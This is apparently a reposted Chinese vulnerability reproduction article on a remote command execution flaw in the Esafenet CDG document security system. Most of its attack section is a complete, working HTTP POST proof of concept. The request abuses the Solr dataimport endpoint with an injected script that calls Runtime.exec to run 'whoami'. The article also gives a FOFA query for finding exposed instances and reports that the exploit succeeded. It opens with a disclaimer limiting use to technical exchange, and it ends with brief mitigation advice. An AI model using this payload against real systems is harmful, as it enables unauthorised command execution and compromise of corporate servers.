前言

此文章僅用于技術(shù)交流，嚴(yán)禁用于對外發(fā)起惡意攻擊！！！

一、產(chǎn)品簡介

億賽通電子文檔安全管理系統(tǒng)（簡稱：CDG）是一款電子文檔安全加密軟件，該系統(tǒng)利用驅(qū)動層透明加密技術(shù)，通過對電子文檔的加密保護(hù)，防止內(nèi)部員工泄密和外部人員非法竊取企業(yè)核心重要數(shù)據(jù)資產(chǎn)，對電子文檔進(jìn)行全生命周期防護(hù)，系統(tǒng)具有透明加密、主動加密、智能加密等多種加密方式，用戶可根據(jù)部門涉密程度的不同（如核心部門和普通部門），部署力度輕重不一的梯度式文檔加密防護(hù)，實現(xiàn)技術(shù)、管理、審計進(jìn)行有機(jī)的結(jié)合，在內(nèi)部構(gòu)建起立體化的整體信息防泄露體系，使得成本、效率和安全三者達(dá)到平衡，實現(xiàn)電子文檔的數(shù)據(jù)安全。

二、漏洞描述

億賽通電子文檔安全管理系統(tǒng)存在遠(yuǎn)程命令執(zhí)行漏洞，攻擊者通過構(gòu)造特定的請求可執(zhí)行任意命令

三、影響范圍

未知

四、復(fù)現(xiàn)環(huán)境

FOFA：app=“億賽通-電子文檔安全管理系統(tǒng)”

五、漏洞復(fù)現(xiàn)

1.POC

POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Length: 86

<?xml version="1.0" encoding="UTF-8"?>
        <RDF>
        <item/>
        </RDF>

2.測試，執(zhí)行成功，但有些命令無法回顯或只能回顯部分

六、修復(fù)建議

禁止外網(wǎng)訪問該系統(tǒng)，安裝安全設(shè)備進(jìn)行防護(hù)，等待廠家修復(fù)。

參考鏈接

https://zkunu7syvm.feishu.cn/docx/JmKgddUcMo4Rt2xLys4c4lN2nbc文章來源地址http://www.zghlxwxcb.cn/news/detail-809834.html

到了這里，關(guān)于億賽通電子文檔安全管理系統(tǒng)遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！